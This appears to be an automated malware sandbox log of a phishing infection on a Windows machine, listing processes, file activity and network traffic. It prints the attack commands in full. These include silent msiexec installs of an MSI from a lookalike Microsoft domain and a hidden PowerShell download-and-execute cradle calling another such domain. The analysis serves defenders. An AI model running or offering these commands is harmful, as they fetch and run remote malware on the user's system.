Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49749 version: TLS 1.2
Too many similar processes found
Source: msiexec.exe Process created: 63

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\dotnet-sdk-8.0.408-win-x64.exe Jump to dropped file
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Creates files inside the system directory
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI379E.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIADD8.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\58adca.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\58adca.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB4DE.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB5CA.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB955.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBA02.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBD00.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBE78.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC213.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC34D.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC7B3.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC9B7.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICEBA.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICF76.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID2E2.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID3DD.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID71A.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID873.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIDC9B.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIDDF3.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE19E.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE22B.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE597.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE625.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIEB75.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIECBF.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF03A.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF26E.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF58C.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF60A.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF956.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFBC8.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5D.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIEB.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI447.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI4E4.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8FC.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9E8.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF28.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFD5.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI15A3.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1640.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI19BC.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1C2E.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI21FB.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI22B7.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2623.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI26F0.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2ED0.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2F6D.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI32BA.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3357.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3656.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3722.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3A7F.tmp Jump to behavior
Deletes files inside the Windows folder
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\58adca.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIADD8.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI379E.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIB5CA.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIB4DE.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIBA02.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIB955.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIBE78.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIBD00.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIC34D.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIC213.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIC9B7.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIC7B3.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSICF76.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSICEBA.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSID3DD.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSID2E2.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSID873.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSID71A.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIDDF3.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIDC9B.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIE22B.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIE19E.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIE625.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIE597.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIECBF.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIEB75.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIF26E.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIF03A.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIF60A.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIF58C.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIFBC8.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIF956.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIEB.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI5D.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI4E4.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI447.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI9E8.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI8FC.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIFD5.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIF28.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI1640.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI15A3.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI1C2E.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI19BC.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI22B7.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI26F0.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI2623.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI2F6D.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI2ED0.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI3357.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI32BA.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI3722.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI3656.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: classification engine Classification label: mal76.phis.evad.win@155/400@7/6
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CMLAFEB.tmp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1332:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1600:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1572:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:832:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_03
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF4FD761B139B07E24.TMP Jump to behavior
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\msiexec.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\Payload Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3264,i,11090072880951647910,17287777256714508569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3492 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3264,i,11090072880951647910,17287777256714508569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4812 /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ggg-logistics.com/"
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EF716064682E1076D0BADB4927A14935
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$s='irm events-data-microsoft.live/h8xiyPNTne';iex ([string]::Join('|', $s, 'iex'))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
